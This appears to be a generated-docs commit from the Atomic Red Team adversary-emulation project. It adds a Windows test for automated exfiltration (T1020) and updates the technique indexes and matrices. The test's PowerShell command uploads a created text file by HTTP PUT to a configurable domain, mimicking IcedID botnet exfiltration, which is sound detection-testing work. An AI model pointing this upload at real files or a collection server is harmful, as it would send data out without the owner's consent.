Generate docs from job=validate_atomics_generate_docs branch=master

2020-07-15 20:04:33 +00:00
parent 9c42adfa8f
commit 72496da590
12 changed files with 93 additions and 7 deletions
@@ -633,6 +633,7 @@ collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f05622
 collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
 collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
 collection,T1113,Screen Capture,4,Import,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
+exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
 exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
 exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
@@ -389,6 +389,7 @@ execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software
 execution,T1047,Windows Management Instrumentation,4,WMI Reconnaissance List Remote Services,0fd48ef7-d890-4e93-a533-f7dedd5191d3,command_prompt
 execution,T1047,Windows Management Instrumentation,5,WMI Execute Local Process,b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3,command_prompt
 execution,T1047,Windows Management Instrumentation,6,WMI Execute Remote Process,9c8ef159-c666-472f-9874-90c8d60d136b,command_prompt
+exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
 credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
 credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
@@ -1189,7 +1189,8 @@
 - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

 # exfiltration
- T1020 Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1020 Automated Exfiltration](../../T1020/T1020.md)
+  - Atomic Test #1: IcedID Botnet HTTP PUT [windows]
 - [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
  - Atomic Test #1: Data Transfer Size Limits [macos, linux]
 - [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
@@ -785,7 +785,8 @@
  - Atomic Test #6: WMI Execute Remote Process [windows]

 # exfiltration
- T1020 Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1020 Automated Exfiltration](../../T1020/T1020.md)
+  - Atomic Test #1: IcedID Botnet HTTP PUT [windows]
 - T1030 Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1048 Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1,7 +1,7 @@
 # All Atomic Tests by ATT&CK Tactic & Technique
 | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
-| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | /etc/passwd and /etc/shadow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
+| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | /etc/passwd and /etc/shadow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | At (Linux) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash](../../T1059.004/T1059.004.md) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
@@ -1,7 +1,7 @@
 # Windows Atomic Tests by ATT&CK Tactic & Technique
 | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
-| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
+| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | Distributed Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
@@ -47973,7 +47973,36 @@ exfiltration:
      - macOS
      - Windows
      x_mitre_is_subtechnique: false
-    atomic_tests: []
+      identifier: T1020
+    atomic_tests:
+    - name: IcedID Botnet HTTP PUT
+      auto_generated_guid: 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0
+      description: |-
+        Creates a text file
+        Tries to upload to a server via HTTP PUT method with ContentType Header
+        Deletes a created file
+      supported_platforms:
+      - windows
+      input_arguments:
+        file:
+          description: Exfiltration File
+          type: String
+          default: C:\temp\T1020_exfilFile.txt
+        domain:
+          description: Destination Domain
+          type: url
+          default: https://google.com
+      executor:
+        command: |-
+          $fileName = "#{file}"
+          $url = "#{domain}"
+          $file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"
+          $contentType = "application/octet-stream"
+          try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}
+        cleanup_command: |-
+          $fileName = "#{file}"
+          Remove-Item -Path $fileName -ErrorAction Ignore
+        name: powershell
  T1030:
    technique:
      id: attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd
@@ -0,0 +1,51 @@
+# T1020 - Automated Exfiltration
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1020)
+<blockquote>Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection. 
+
+When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - IcedID Botnet HTTP PUT](#atomic-test-1---icedid-botnet-http-put)
+
+
+<br/>
+
+## Atomic Test #1 - IcedID Botnet HTTP PUT
+Creates a text file
+Tries to upload to a server via HTTP PUT method with ContentType Header
+Deletes a created file
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| file | Exfiltration File | String | C:&#92;temp&#92;T1020_exfilFile.txt|
+| domain | Destination Domain | url | https://google.com|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$fileName = "#{file}"
+$url = "#{domain}"
+$file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"
+$contentType = "application/octet-stream"
+try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}
+```
+
+#### Cleanup Commands:
+```powershell
+$fileName = "#{file}"
+Remove-Item -Path $fileName -ErrorAction Ignore
+```
+
+
+
+
+
+<br/>
@@ -2,6 +2,7 @@ attack_technique: T1020
 display_name: Automated Exfiltration
 atomic_tests:
 - name: IcedID Botnet HTTP PUT
+  auto_generated_guid: 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0
  description: |-
    Creates a text file
    Tries to upload to a server via HTTP PUT method with ContentType Header
@@ -542,3 +542,4 @@ d9841bf8-f161-4c73-81e9-fd773a5ff8c1
 263ae743-515f-4786-ac7d-41ef3a0d4b2b
 2770dea7-c50f-457b-84c4-c40a47460d9f
 7c1acec2-78fa-4305-a3e0-db2a54cddecd
+9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0